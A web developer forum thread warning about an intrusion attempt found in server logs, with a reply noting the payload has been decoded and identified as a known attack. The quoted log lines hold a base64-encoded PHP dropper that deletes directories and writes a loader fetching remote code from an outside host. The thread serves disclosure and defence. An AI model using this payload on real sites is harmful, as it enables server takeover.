ajax code injection hacking attempt

M

me

:)

I came across this in my log files today, and thought I'd warn people who
use Ajax. (Could be a well documented thing, I don't know where to check)

77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
/engine/ajax/updates.php?wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei4zNDQwNDY5M2JiNzE4ZmFmZDg1NzI3MTg4M2M2NmQ3Ni5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5ZbkJyZEdWdkp6c0tKRzVsZDBScGNpQTlJQ2RpY0d0MFpXOG5Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxqTTBOREEwTmprelltSTNNVGhtWVdaa09EVTNNamN4T0Rnell6WTJaRGMyTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==
HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1; .NET CLR 1.1.4322)"
77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
/engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
/index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Marc.
 
M

Michael Haufe (TNO)

:)

I came across this in my log files today, and thought I'd warn people who
use Ajax. (Could be a well documented thing, I don't know where to check)

77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
/engine/ajax/updates.php?wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei4zNDQwNDY5M2JiNzE4ZmFmZDg1NzI3MTg4M2M2NmQ3Ni5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5ZbkJyZEdWdkp6c0tKRzVsZDBScGNpQTlJQ2RpY0d0MFpXOG5Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxqTTBOREEwTmprelltSTNNVGhtWVdaa09EVTNNamN4T0Rnell6WTJaRGMyTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==
HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1; .NET CLR 1.1.4322)"
77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
/engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
/index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Marc.
Click to expand...


I've decoded the above here: http://pastebin.com/1vwJEUw0
 
M

me

Michael Haufe (TNO) said:
:)

I came across this in my log files today, and thought I'd warn people who
use Ajax. (Could be a well documented thing, I don't know where to check)

77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
/engine/ajax/updates.php?>wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei4zNDQwNDY5M2JiNzE4ZmFmZDg1NzI3MTg4M2M2NmQ3Ni5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5ZbkJyZEdWdkp6c0tKRzVsZDBScGNpQTlJQ2RpY0d0MFpXOG5Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxqTTBOREEwTmprelltSTNNVGhtWVdaa09EVTNNamN4T0Rnell6WTJaRGMyTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==
HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;
SV1; .NET CLR 1.1.4322)"
77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
/engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
/index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Marc.
Click to expand...

I've decoded the above here: http://pastebin.com/1vwJEUw0
Click to expand...

Thanks; googling their server name reveals it's a known attack that's been
around since 2009; more info at: http://pastebin.com/Qtk8jSfR

Marc.
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

Trouble with quotes 1
Object required in AJAX 1
Browser type 6
Is this an Ajax error? 1
IIS 7.0 and Windows Integrated Authentication? 1
Asp.Net Deployment IIS 6 0
Problems with javascript location.href 2
iView is not compatible with your browser 0

Members online

Total: 29 (members: 2, guests: 27)
Robots: 456

Forum statistics

Threads
473,767
Messages
2,569,572
Members
45,046
Latest member
Gavizuho

Latest Threads

Top